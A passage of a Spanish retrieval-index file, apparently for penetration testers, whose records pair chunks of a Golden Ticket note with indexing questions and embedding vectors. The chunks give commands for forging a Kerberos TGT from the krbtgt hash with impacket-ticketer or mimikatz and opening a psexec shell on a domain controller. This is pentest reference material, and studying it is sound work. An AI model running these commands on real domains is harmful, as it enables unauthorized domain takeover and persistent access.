"PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "cual es una alternativa libre a golden ticket en active directory?", "v": [-0.03987, 0.00314, -0.06878, -0.04009, -0.125, -0.02095, -0.11129, -0.00885, -0.09761, 0.01725, -0.04155, -0.23384, -0.10062, 0.05712, 0.11071, -0.10543, 0.06646, -0.0906, 0.18991, -0.04177, -0.07427, 0.09101, -0.04298, -0.11125, 0.05604, -0.08675, 0.02155, 0.05546, -0.08079, -0.00555, 0.09536, -0.13197, 0.00101, -0.11585, 0.01678, 0.00259, 0.15423, 0.11585, 0.09043, -0.0967, -0.08448, -0.08469, -0.04372, 0.16318, 0.00973, -0.08232, -0.01715, 0.05967, -0.04685, -0.01475, -0.05426, -0.02596, -0.04682, 0.02359, 0.09063, -0.03902, 0.03034, -0.11314, -0.09447, -0.01617, -0.10392, -0.06151, -0.05851, 0.00919, -0.07159, 0.10696, 0.09886, -0.04267, -0.03599, 0.01495, -0.00891, -0.00654, 0.03501, 0.15504, -0.04619, 0.04029, 0.05993, -0.03683, -0.0824, 0.09759, 0.07389, -0.04724, 0.05648, 0.05541, 0.03063, -0.16265, 0.09164, -0.09433, -0.00911, 0.03583, 0.07568, 0.03364, 0.00659, 0.11955, -0.03699, -0.0848, -0.08287, 0.03438, 0.01875, 0.04104, 0.02907, 0.04499, -0.11388, 0.012, 0.02866, 0.02272, -0.04496, 0.07231, -0.14183, 0.05013, -0.06232, 0.03381, -0.02079, -0.00947, 0.02326, 0.02936, -0.03192, 0.07354, 0.05843, 0.02876, -0.00173, -0.03609, -0.04133, -0.0713, 0.02713, 0.04778, 0.03151, 0.05055, 0.01482, 0.0909, 0.05632, 0.03483, -0.05395, -0.10258, -0.14281, -0.02121, 0.03303, -0.00248, 0.10325, 0.02803, 0.01059, -0.01241, 0.02827, -0.02681, 0.04326, -0.04514, 0.00938, -0.03305, -0.04561, -0.03723, -0.07594, -0.01924, -0.00396, 0.15311, -0.01654, 0.05353, 0.02659, -0.00798, -0.07453, 0.01357, 0.0253, 0.00544, -0.02356, 0.0503, -0.02015, 0.01093, -0.0505, -0.03562, -0.04481, 0.03709, 0.01403, 0.06184, 0.1141, -0.08153, 0.03786, -0.08852, -0.00881, -0.04827, 0.07971, -0.02578, 0.11353, -0.0057, -0.07185, 0.03123, -0.02542, -0.01849, 0.03197, -0.02833, 0.04112, 0.04966, -0.02386, 0.02629, -0.0554, -0.02044, -0.04681, -0.01538, -0.02449, -0.10071, -0.02466, -0.06385, -0.03423, 0.00251, -0.01023, -0.03313, 0.02953, 0.00277, -0.02638, 0.03683, 0.03533, 0.05708, 0.01723, 0.00066, 0.12632, 0.0515, -0.06287, -0.01307, 0.02585, -0.00366, -0.03705, -0.04296, 0.08081, 0.01809, 0.01141, -0.03324, 0.00847, -0.01043, 0.02094, 0.04399, 0.03926, 0.03104, 0.05571, 0.00569, -0.00585, 0.04903, 0.056, 0.00807, 0.00687, 0.00814, -0.05319, 0.0345, 0.03756, 0.07278, 0.01751, 0.05317, -0.04739, 0.0494, -0.04949, -0.01251, -0.00424, -0.02364, -0.01178, -0.00484, -0.00661, -0.02665, -0.02251, -0.01214]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "quΓ© tΓ©cnica sirve para obtener el hash NTLM de la cuenta krbtgt?", "v": [-0.04237, -0.12487, -0.02508, -0.05643, 0.13573, -0.20802, -0.0786, 0.20013, -0.04202, 0.08636, -0.1771, -0.03968, 0.1195, 0.04799, 0.05106, 0.07779, -0.09399, -0.13788, 0.04608, 0.04515, -0.04281, -0.1095, -0.10331, -0.00023, -0.08984, -0.07641, 0.00277, 0.00359, -0.21608, 0.11943, -0.0123, -0.06774, -0.11719, 0.08845, 0.01416, -0.01074, 0.03814, 0.08338, -0.03074, 0.11507, 0.06464, -0.02581, 0.00251, 0.12906, 0.14898, -0.12144, -0.0554, 0.00968, 0.01728, -0.02278, -0.04607, 0.12508, -0.15807, -0.10084, -0.08882, -0.02027, 0.03521, -0.08555, -0.01532, -0.03998, -0.04581, -0.09003, -0.02046, -0.10431, -0.02603, -0.12961, -0.03537, -0.04489, -0.0257, -0.05178, -0.13172, 0.06558, 0.00431, -0.08962, -0.05445, 0.06659, -0.03742, 0.04697, 0.07714, -0.0104, 0.04933, -0.08862, -0.09109, -0.09433, -0.12881, -0.11702, 0.1014, -0.03811, 0.0193, -0.09805, 0.07018, 0.0891, 0.04696, 0.00903, 0.08325, -0.00427, 0.0296, 0.02922, 0.01666, 0.05363, 0.01938, -0.06008, -0.05071, 0.08454, -0.06512, 0.02091, 0.09581, -0.02776, 0.01211, -0.00803, 0.01501, 0.02934, -0.13976, -0.00735, -0.05263, -0.00042, -0.0389, -0.09642, -0.0034, 0.02673, -0.05209, 0.02696, 0.08334, 0.04586, 0.04842, -0.08032, -0.05592, 0.04304, -0.01202, 0.05278, 0.01195, -0.04108, -0.01153, 0.00362, 0.00224, -0.05556, 0.01887, -0.00594, -0.0635, -0.07199, 0.01161, 0.07441, -0.06356, -0.11025, -0.00214, -0.02772, 0.0722, -0.09952, 0.03812, -0.06594, 0.04014, -0.03136, -0.01163, 0.02213, -0.01016, -0.06816, -0.01504, -0.03717, -0.07774, 0.06768, 0.03733, 0.01011, 0.01657, 0.04933, -0.02814, -0.04571, -0.01233, -0.03926, 0.07064, -0.00157, 0.00355, 0.01289, -0.01022, -0.0168, 0.01587, -0.02205, -0.00046, -0.02071, -0.03887, -0.0902, -0.04349, 0.02568, 0.0215, -0.04087, 0.03774, -0.02122, 0.00403, -0.01064, 0.03781, 0.01717, -0.05989, 0.0199, -0.08862, -0.01286, -0.05993, -0.03828, 0.01023, -0.03828, 0.05941, -0.02616, -0.02822, 0.04162, 0.00353, -0.05385, 0.00885, 0.00534, -0.02078, 0.01049, -0.07293, -0.01538, 0.05362, -0.04006, 0.06339, -0.02815, -0.03776, 0.00609, -0.01998, -0.03841, 0.00249, 0.04014, -0.00304, -0.01548, -0.01417, -0.00391, 0.00841, -0.04548, 0.04723, -0.00815, -0.00191, 0.03114, -0.05031, 0.01931, -0.00979, 0.02621, 0.045, 0.02101, -0.00171, 0.02127, 0.00132, -0.06783, 0.03037, 0.03616, -0.02758, -0.01843, 0.00949, -0.03464, -0.08027, 0.02612, 0.00567, -0.04897, 0.01156, -0.04369, 0.01797, 0.03296, 0.00875, -0.04197]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "con quΓ© herramienta puedo acceder a los secretos del dominio?", "v": [0.01308, 0.03597, -0.15211, -0.114, 0.02551, -0.07457, -0.04103, -0.0662, -0.14435, 0.00326, 0.0052, -0.01484, -0.04177, -0.19098, 0.05663, -0.00366, 0.25764, -0.03655, -0.07314, -0.00716, 0.0772, -0.06237, -0.07929, -0.01883, -0.04228, -0.13431, 0.09871, 0.00858, -0.07494, 0.09302, -0.0024, 0.01373, 0.00611, -0.04749, -0.06894, -0.03064, 0.05531, 0.13513, 0.06768, 0.03542, 0.0383, -0.0547, -0.03698, 0.07333, -0.02196, 0.01638, -0.10507, -0.02027, 0.01176, -0.02278, -0.02961, -0.21129, -0.14947, -0.07893, 0.0132, -0.1086, 0.22451, -0.07417, 0.04155, -0.0731, -0.08016, -0.03884, -0.02085, 0.05324, -0.06123, -0.11418, 0.02611, -0.0054, -0.05052, 0.08109, 0.00633, -0.00428, 0.06815, 0.02506, 0.04403, -0.03803, 0.035, -0.00456, 0.01937, -0.04178, 0.0316, 0.05396, -0.07433, -0.02979, -0.09618, -0.15203, -0.00765, -0.12354, -0.01292, -0.11221, 0.0534, 0.0577, -0.08016, 0.01614, -0.02763, 0.00572, 0.04787, -0.10294, -0.07432, -0.0499, 0.12869, 0.0836, -0.17233, 0.1529, 0.0768, 0.07216, -0.0455, -0.07402, -0.03261, 0.01474, -0.00067, 0.03599, -0.06838, -0.01567, -0.00916, 0.11063, -0.05731, -0.01433, -0.01492, -0.07715, -0.09133, -0.02435, -0.02771, 0.00832, 0.02522, -0.03891, -0.01769, 0.04333, -0.04711, -0.15822, -0.02109, -0.01531, -0.03256, 0.05716, 0.04942, 0.01132, -0.00165, -0.08644, -0.03039, -0.05864, 0.01226, -0.03662, -0.08369, -0.06958, 0.00555, -0.08417, 0.0406, -0.08763, -0.03297, -0.03725, -0.05445, -0.07034, -0.00329, 0.05074, 0.01585, 0.03922, -0.0838, -0.00316, -0.04563, 0.06021, -0.07033, 0.00615, -0.05883, -0.0113, -0.02293, -0.06198, 0.04551, -0.02572, -0.00261, 0.09462, -0.01441, 0.02965, 0.04167, -0.01299, 0.00141, -0.04088, -0.02447, -0.0127, 0.00703, -0.05402, -0.05306, -0.0158, -0.00427, 0.02316, -0.03196, 0.02713, 0.01751, -0.03979, -0.01617, 0.07015, -0.01127, 0.01927, -0.00015, -0.02961, 0.01858, 0.00408, -0.02625, -0.0454, 0.06029, -0.01704, 0.00229, -0.01126, -0.00279, -0.03699, 0.03249, 0.03058, -0.01029, -0.03694, 0.00321, 0.00941, 0.05522, -0.04002, 0.00196, -0.06804, -0.01172, 0.02182, -0.06624, 0.01058, -0.06654, -0.04364, 0.02427, 0.05472, 0.07837, -0.05456, 0.05832, 0.00719, 0.03719, 0.00621, 0.03892, 0.05498, 0.00152, 0.00491, -0.04251, 0.01936, 0.05119, -0.0367, 0.02649, 0.00261, -0.05859, 0.02401, -0.0659, 0.06742, 0.06521, -0.05435, -0.04885, -0.07772, -0.04366, 0.00633, -0.01836, -0.06097, -0.00845, 0.00074, 0.02848, -0.03708, -0.00318, -0.04582]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Requisito\nHash NTLM de la cuenta **krbtgt** β†’ se obtiene con DCSync o secretsdump sobre el DC.", "indexar": "cΓ³mo puedo extraer credenciales de un controlador de dominio?", "v": [0.09148, 0.01152, -0.05039, -0.02593, 0.05665, -0.0265, 0.16336, 0.06269, -0.12953, -0.10811, -0.03127, -0.03314, -0.01729, -0.2353, 0.00905, -0.02644, 0.20499, -0.06518, -0.04634, -0.02774, -0.00261, -0.13705, -0.01947, -0.09527, 0.06774, -0.00212, -0.08286, 0.01423, -0.02048, 0.06957, -0.00258, 0.01115, 0.05026, 0.02629, -0.02078, -0.02633, -0.09574, 0.08764, 0.03367, 0.15382, 0.00359, -0.02632, -0.05391, -0.04115, -0.00335, 0.00475, 0.0409, -0.06684, -0.01154, -0.08815, -0.05884, -0.07751, -0.09275, -0.01887, 0.02719, -0.01442, 0.09002, -0.08491, 0.09803, -0.0818, 0.0211, -0.09975, 0.11178, 0.08904, -0.17324, -0.0277, -0.00831, -0.04046, -0.10194, 0.04532, -0.06278, 0.00314, 0.06123, 0.05962, 0.02537, -0.07441, 0.0463, 0.02289, 0.1383, -0.05985, 0.06603, -0.03927, -0.03478, -0.07458, -0.02758, -0.05669, -0.15787, -0.20147, -0.04662, 0.01614, 0.02572, -0.01941, -0.03083, -0.05146, -0.05278, -0.00807, -0.00422, 0.03681, -0.10052, -0.03676, 0.08794, 0.09099, -0.11008, 0.18261, 0.10449, 0.13007, 0.09742, -0.06853, -0.026, -0.05755, -0.02795, 0.01552, -0.08719, -0.03299, -0.09274, 0.07905, -0.06589, -0.00392, 0.03862, -0.05719, -0.04234, -0.13041, 0.13238, -0.05667, 0.05546, 0.04014, -0.0253, 0.07072, 0.00735, -0.16326, -0.05462, -0.03109, 0.04536, -0.03863, 0.04029, 0.0784, -0.03315, -0.02033, -0.05957, 0.02934, -0.05432, -0.00587, 0.01326, -0.03456, 0.05319, -0.09955, -0.01502, -0.05344, -0.02364, -0.07186, -0.01096, 0.06698, 0.00603, 0.07167, 0.02331, 0.01097, 0.00668, -0.00855, 0.01001, 0.07841, -0.04844, -0.00824, -0.04063, 0.02413, 0.01488, 0.01156, -0.01976, -0.06589, -0.03139, 0.04824, -0.02565, 0.04674, -0.01152, -0.02636, 0.00609, -0.03299, 0.03936, -0.0627, -0.00272, -0.0595, 0.00687, 0.04872, -0.01731, 0.03039, -0.04552, 0.05573, 0.01537, 0.01037, -0.0267, 0.06559, 0.06975, 0.03855, -0.02226, -0.02043, 0.04042, -0.00143, 0.05731, 0.01195, -0.04953, -0.01056, -0.03402, -0.00719, 0.02022, -0.04004, -0.01118, 0.02724, 0.0063, 0.04481, 0.01349, -0.00851, 0.0214, -0.02792, 0.04078, -0.03744, -0.07315, 0.02462, -0.0144, -0.04275, -0.01729, -0.10092, 0.02318, 0.02831, 0.06215, 0.04452, 0.00062, -0.033, -0.00659, 0.02303, -0.0054, 0.07923, 0.01144, 0.03581, -0.00592, -0.05601, 0.02858, 0.01956, 0.0484, -0.02382, 0.01556, -0.01266, -0.03743, 0.04578, -0.00802, -0.06753, -0.08685, -0.08997, -0.09099, 0.0188, -0.00195, -0.03654, 0.0478, 0.01021, 0.05414, -0.04311, -0.02335, 0.00131]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "quΓ© herramienta puedo usar para obtener credenciales de dominio con una hash KRBTGT?", "v": [-0.14627, -0.0866, -0.10824, -0.07117, 0.05302, -0.12706, -0.03861, 0.08227, -0.08705, -0.01093, -0.13798, 0.0075, -0.06717, -0.10766, 0.07926, 0.06103, 0.01808, -0.05419, -0.12384, -0.05804, -0.01225, -0.13531, -0.06363, 0.00016, -0.07276, -0.04701, -0.01016, 0.08303, -0.09858, 0.15952, 0.01896, 0.00766, -0.11623, 0.04319, -0.12291, -0.10132, -0.08431, 0.17343, 0.12626, 0.14051, 0.06399, 0.00179, -0.0478, 0.16079, 0.03937, -0.00049, -0.06226, -0.04605, -0.09532, -0.06293, 0.02872, -0.14753, -0.2219, -0.02937, 0.05092, -0.10197, 0.14229, -0.15716, -0.08288, -0.11516, -0.10711, -0.056, -0.02388, 0.00576, -0.09905, -0.14965, 0.05046, -0.02318, -0.12562, 0.08845, -0.05986, -0.02411, 0.07937, 0.04611, 0.04379, 0.02423, 0.02216, 0.00518, 0.09576, 0.00432, 0.03387, -0.03562, -0.0199, -0.03028, -0.14143, -0.12556, 0.04704, -0.08999, 0.0432, -0.02884, -0.02232, 0.09546, -0.01355, -0.07826, -0.01576, -0.03338, 0.00766, -0.07966, -0.07183, -0.04167, 0.08096, -0.00383, -0.07568, 0.10225, 0.01565, -0.00743, 0.00557, -0.04776, 0.01324, -0.02722, 0.06437, -0.01208, -0.05877, 0.03893, -0.04044, 0.09675, -0.04867, -0.04779, -0.0138, -0.0469, 0.01981, 0.00633, 0.06376, -0.03047, 0.05032, -0.01715, -0.0392, 0.02182, -0.08299, -0.14083, -0.02414, 0.00918, -0.063, -0.04826, 0.0091, 0.03999, 0.05414, -0.05241, -0.06659, -0.02661, 0.00812, 0.01239, -0.08995, -0.09834, 0.00594, -0.02511, 0.01821, -0.06967, 0.01638, -0.06421, 0.04655, -0.02883, 0.00353, -0.03743, -0.01828, 0.01142, -0.01655, 0.01234, -0.06707, 0.01023, -0.07338, -0.05782, 0.00362, 0.05708, 0.04203, -0.0622, 0.09023, -0.00544, 0.01846, 0.06984, 0.02752, 0.04409, 0.03642, -0.00106, 0.04408, -0.05257, -0.03719, 0.02718, -0.05719, -0.09538, 0.01957, -0.05356, -0.00524, 0.01923, 0.0327, 0.05079, 0.02547, 0.02481, -0.01126, 0.01406, 0.00995, 0.07105, -0.01714, -0.00563, 0.02143, 0.03566, 0.0543, -0.04146, 0.01095, -0.01006, -0.04398, -0.01825, 0.01977, -0.05736, 0.05624, -0.00499, -0.0459, -0.01133, -0.00893, 0.02016, 0.01943, -0.01938, 0.01617, -0.05424, -0.01984, 0.0182, -0.07499, 0.0131, -0.04505, -0.06773, -0.01004, 0.06372, -0.00641, 0.00242, 0.00821, 0.01725, 0.00283, -0.00393, 0.01184, 0.03552, 0.01441, -0.01999, -0.028, -0.00791, 0.02867, -0.03254, 0.02748, 0.02787, -0.01448, -0.02287, -0.04678, 0.03529, 0.0304, 0.00033, -0.04261, -0.05616, -0.03236, 0.01601, -0.0364, -0.03127, 0.00498, -0.00476, 0.04623, -0.02049, -0.02816, 0.01304]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "cΓ³mo montarΓ­a un ataque de Golden Ticket contra mi dominio corporativo?", "v": [-0.07185, -0.08511, 0.04615, -0.02098, -0.17516, 0.05421, 0.04985, 0.05389, -0.15359, -0.03859, 0.01482, -0.03853, -0.03159, -0.02968, 0.01521, -0.05497, 0.19202, -0.0374, 0.01995, -0.09656, -0.01927, -0.02147, 0.14174, -0.11336, 0.14288, -0.07993, 0.07931, 0.01966, 0.00996, 0.0356, 0.11539, -0.16124, -0.03271, -0.05219, -0.00036, -0.15631, -0.02875, 0.06636, 0.13394, 0.07311, 0.04593, -0.09814, -0.1261, -0.01789, 0.06634, -0.09667, 0.02523, 0.00401, -0.08347, -0.01579, 0.02756, 0.04317, -0.10778, -0.05947, 0.00417, 0.01432, 0.02169, -0.04477, 0.03047, -0.01323, -0.06625, -0.10344, -0.07374, 0.05888, -0.12816, 0.05119, 0.00399, -0.00288, -0.00985, -0.00679, -0.00561, -0.04077, -0.01051, 0.08101, 0.13363, -0.07793, 0.1381, 0.05283, -0.00091, 0.05857, 0.07676, 0.03042, -0.02958, 0.05281, -0.0615, -0.096, -0.00237, -0.11671, -0.06432, 0.02509, -0.01738, -0.04595, -0.05591, -0.10366, -0.14764, -0.10597, -0.02958, -0.13648, -0.08072, 0.05995, 0.01614, 0.01936, -0.07141, 0.03008, 0.05611, 0.12803, -0.08904, -0.10292, -0.00768, -0.07849, -0.11697, -0.03563, -0.12867, -0.0361, 0.00084, -0.03709, 0.00373, 0.06, 0.10464, -0.01791, -0.04677, -0.02044, 0.01743, 0.02405, -0.06983, 0.01109, 0.00942, -0.08969, -0.05447, -0.13137, -0.08646, 0.03818, 0.02957, 0.01089, -0.00239, 0.07619, -0.01869, -0.04205, -0.00838, -0.00137, 0.0103, 0.01236, -0.01792, 0.00116, 0.00133, -0.07416, 0.02738, -0.09887, -0.07793, 0.09178, -0.08545, -0.04076, -0.06593, 0.07441, -0.04841, 0.00868, -0.04205, -0.03452, -0.02124, 0.1002, -0.02768, 0.03756, -0.0825, 0.1074, 0.03634, -0.01457, 0.0098, -0.02454, 0.01963, 0.08511, 0.05564, 0.03985, -0.00113, -0.00226, 0.00549, -0.05009, -0.01858, -0.02179, 0.08011, -0.00386, 0.06409, -0.04891, -0.01693, 0.07799, -0.04466, 0.07573, 0.07215, 0.01466, 0.02615, 0.01357, 0.00484, 0.028, 0.02683, 0.02941, 0.0314, -0.12458, -0.05304, -0.037, 0.00964, -0.00899, -0.00072, -0.04841, -0.05758, 0.00825, 0.0821, 0.0304, -0.01492, -0.03557, -0.00883, 0.09125, -0.0006, 0.0172, 0.08799, -0.06033, -0.09632, -0.01677, 0.0063, 0.00823, -0.0302, -0.00391, 0.03752, 0.03087, 0.03038, 0.00642, -0.01696, -0.0369, -0.03161, -0.03145, 0.02003, 0.04752, 0.03126, -0.01972, 0.00595, 0.03446, 0.01812, -0.02265, 0.05866, -0.04159, -0.06876, 0.04564, 0.0013, 0.03746, 0.02649, 0.06384, -0.06362, -0.05906, -0.06088, 0.0654, 0.00852, 0.01111, 0.00823, -0.00661, -0.00451, -0.01284, -0.01383, -0.01116]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Forjar\n```bash\nimpacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nimpacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local\n```\n```", "indexar": "cual es la alternativa libre a impacket-ticketer para el ataque Golden Ticket?", "v": [-0.14245, -0.07715, -0.07925, -0.06703, -0.12648, 0.0073, -0.00947, 0.0638, -0.01268, 0.07057, -0.04888, -0.09231, -0.07563, 0.13521, 0.09823, -0.03679, 0.03601, -0.06016, 0.24732, -0.06113, -0.03236, 0.14524, 0.04157, -0.1612, 0.05002, 0.02427, 0.04665, 0.13464, -0.06003, -0.0199, 0.0509, -0.167, -0.05602, -0.10832, 0.05466, -0.08382, 0.11479, 0.12146, 0.12749, -0.06741, 0.02041, -0.0176, -0.06529, 0.08428, 0.04395, -0.12234, 0.02208, 0.16923, -0.02791, -0.09164, 0.0238, 0.01928, -0.06841, 0.00559, 0.06141, -0.04564, 0.03631, -0.07671, -0.06252, 0.07199, -0.07938, -0.05738, -0.02991, -0.00564, -0.03429, 0.14369, 0.00753, -0.0037, -0.00989, -0.04118, -0.01663, -0.01056, 0.07202, 0.09087, -0.0077, 0.02755, 0.06233, 0.04509, 0.00932, 0.10631, 0.09135, -0.02153, -0.01279, 0.03021, 0.03683, -0.06492, 0.1177, -0.09698, -0.07029, 0.08698, 0.01902, -0.02709, 0.03471, 0.03638, -0.03868, -0.15793, -0.05997, -0.0743, -0.07546, 0.01275, 0.00938, -0.0381, -0.06983, -0.00437, -0.01637, -0.00245, -0.02297, -0.00063, -0.08377, 0.02395, -0.06717, 0.0257, -0.0536, -0.00218, 0.03917, -0.01467, 0.05041, 0.04734, 0.10965, 0.01392, 0.02121, 0.0128, -0.0603, -0.08404, 0.02948, 0.04522, 0.0215, -0.01922, 0.01777, -0.00588, -0.00493, 0.04997, -0.00223, -0.00842, -0.06728, -0.03163, -0.00173, -0.09557, 0.04934, 0.12627, 0.04096, 0.0129, 0.0183, 0.02375, 0.02911, -0.06272, -0.04184, 0.00423, -0.08206, 0.00576, -0.01129, -0.01298, -0.01606, 0.19168, -0.03343, 0.01695, -0.03275, -0.0259, -0.09024, 0.07569, -0.00969, -0.01614, -0.05304, 0.09098, 0.00976, 0.01601, -0.02889, -0.04262, -0.03002, 0.06584, 0.03165, 0.02285, 0.10937, 0.0254, 0.00268, -0.11203, -0.04673, -0.06912, 0.11301, -0.05691, 0.11541, -0.02095, -0.06971, 0.03417, -0.04281, -0.04487, 0.06064, -0.01764, 0.05234, 0.03161, -0.03845, 0.00978, 0.02203, 0.00053, -0.04875, -0.06508, -0.04077, -0.08437, -0.03108, 0.01403, -0.03182, -0.01147, -0.03439, -0.02052, 0.06837, 0.02503, -0.03527, -0.01517, 0.00649, 0.09953, 0.04447, -0.0213, 0.13219, -0.0455, -0.07278, -0.018, 0.04165, -0.01008, -0.01577, -0.0076, 0.09393, 0.01758, 0.01113, -0.01198, 4e-05, -0.05141, 0.00701, 0.01139, 0.05517, 0.0168, 0.0555, 0.00237, 0.01585, 0.03845, 0.03862, 0.00413, 0.0538, 0.00697, -0.09418, 0.04704, 0.02573, 0.05772, -0.02221, 0.0348, -0.0161, 0.03159, -0.06129, 0.02495, 0.01994, -0.03608, -0.00951, 0.03149, -0.01578, -0.02359, 0.02522, -0.00321]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "que herramienta sirve para robar credenciales Kerberos en Windows?", "v": [-0.04149, -0.15957, -0.03779, -0.12319, 0.02603, -0.13958, 0.0171, 0.12209, 0.0838, -0.20605, -0.07172, -0.13841, 0.07608, -0.15229, 0.12515, 0.09882, -0.14216, -0.00187, 0.01543, 0.08673, 0.04925, 0.03893, -0.04712, -0.00412, -0.0424, -0.01033, -0.02984, -0.0651, -0.12928, 0.15623, -0.02502, -0.00655, 0.00447, -0.04931, -0.11915, 0.00534, -0.12021, 0.04112, -0.0211, 0.1498, 0.0886, 0.13803, -0.00662, 0.06271, 0.07872, -0.00488, -0.01667, -0.02011, 0.05719, 0.11619, 0.00314, -0.16106, -0.06264, -0.0827, 0.01502, -0.10853, 0.1353, -0.04583, -0.00115, -0.08113, -0.10771, 0.04033, -0.13746, -0.00503, 0.04323, -0.09125, 0.02725, -0.06783, 0.02314, 0.0758, -0.1196, 0.06689, 0.07973, 0.04936, 0.01165, -0.01667, -0.03014, 0.02557, 0.06431, -0.0078, 0.06926, 0.04112, -0.0452, 0.0164, 0.02199, -0.13926, 0.11709, -0.001, 0.01006, -0.06631, 0.02821, 0.07384, -0.05679, 0.03691, -0.01655, -0.05953, -0.01364, -0.02742, -0.0462, 0.03749, 0.06045, -0.17516, -0.09096, 0.06794, -0.09293, 0.05234, -0.06978, 0.01042, -0.0658, -0.10097, 0.0343, 0.05682, 0.00679, 0.03129, -0.01369, 0.11476, -0.01071, -0.06674, -0.01338, 0.00609, 0.04158, -0.0237, -0.06555, -0.05877, -0.017, -0.03525, -0.01007, 0.10668, -0.0952, -0.09484, 0.03872, 0.01499, -0.03045, 0.04391, -0.02529, -0.00444, -0.01853, -0.13429, -0.05393, -0.01825, 0.03483, 0.09148, -0.01955, -0.03466, -0.00664, 0.04075, 0.08259, 0.04519, 0.04375, -0.09895, 0.03577, -0.02771, -0.08671, -0.01775, -0.01544, 0.03357, 0.00662, 0.04646, -0.06831, -0.00132, -0.02169, -0.0501, 0.03984, -0.00441, -0.01362, -0.06048, 0.05643, 0.05676, 0.06214, 0.02377, 0.06089, 0.03445, 0.03502, -0.02308, -0.00801, 0.0055, 0.06216, 0.02133, -0.05872, -0.0715, -0.05328, 0.03432, 0.04294, -0.00711, -0.0087, 0.01738, 0.01519, 0.01901, -0.06142, -0.03029, -0.01226, -0.04879, 0.02323, -0.03529, 0.02256, 0.00814, -0.00642, -0.03279, 0.04471, 0.03465, -0.06507, 0.01466, -0.0349, -0.02404, 0.10931, 0.06692, 0.01453, -0.01757, 0.01558, 0.06086, 0.03127, 0.00522, 0.00857, -0.06718, -0.01076, -0.05657, 0.01892, 0.02891, -0.05847, -0.03312, 0.02808, -0.01138, 0.02703, -0.00259, -0.00573, 0.04386, -0.08693, -0.02807, -0.03586, -0.02611, 0.02463, -0.00392, -0.03689, -0.00806, -0.01098, -0.06321, 0.01637, -0.00357, -0.00081, -0.06137, -0.09209, 0.02787, -0.01717, -0.06174, -0.07933, -0.00432, 0.01539, -0.01554, 0.00609, -0.03923, 0.0239, 0.00197, -0.01003, -0.01811, -0.02239, -0.00047]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# mimikatz equivalente:\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt\n```", "indexar": "con que puedo realizar un ataque de robo de tokens Kerberos?", "v": [-0.06952, -0.09283, -0.1425, 0.01043, -0.05057, -0.07538, 0.0321, 0.25221, 0.01856, -0.1063, -0.14624, -0.12935, 0.12837, -0.04682, 0.22556, 0.0593, -0.08257, 0.01312, 0.1567, 0.05624, 0.10591, -0.0259, -0.02819, 0.05288, 0.12063, 0.05939, 0.01805, 0.03768, -0.04967, 0.04709, -0.0505, -0.14222, -0.00519, 0.00914, -0.02576, -0.08483, -0.00183, 0.18782, 0.08287, 0.16134, 0.0435, 0.01033, -0.19527, -0.0565, 0.04802, 0.02949, 0.04244, 0.02607, 0.07733, -0.00306, 0.1079, -0.01701, -0.1286, -0.13919, -0.04901, -0.09105, 0.08258, -0.06056, -0.00968, 0.00442, -0.11862, -0.00736, -0.08836, -0.07115, 0.02737, -0.10341, -0.05287, 0.05084, -0.05096, 0.04135, 0.0447, 0.058, 0.00931, 0.08907, 0.08576, 0.01288, -0.02262, 0.03372, -0.00516, 0.01028, -0.05164, -0.03611, -0.10542, 0.05363, -0.02446, -0.1053, 0.03162, -0.04149, -0.02591, -0.03415, 0.00463, 0.03529, 0.01695, -0.03723, -0.09229, 0.02789, -0.09655, -0.03773, -0.07827, -0.05453, -0.01493, -0.04753, -0.0653, 0.06701, 0.06047, 0.10789, -0.04955, 0.02354, 0.0114, -0.17107, -0.05708, -0.02654, -0.01641, -0.09913, 0.01366, 0.07791, -0.09982, 0.02809, 0.09351, 0.04162, -0.05209, -0.00536, -0.0267, 0.02155, 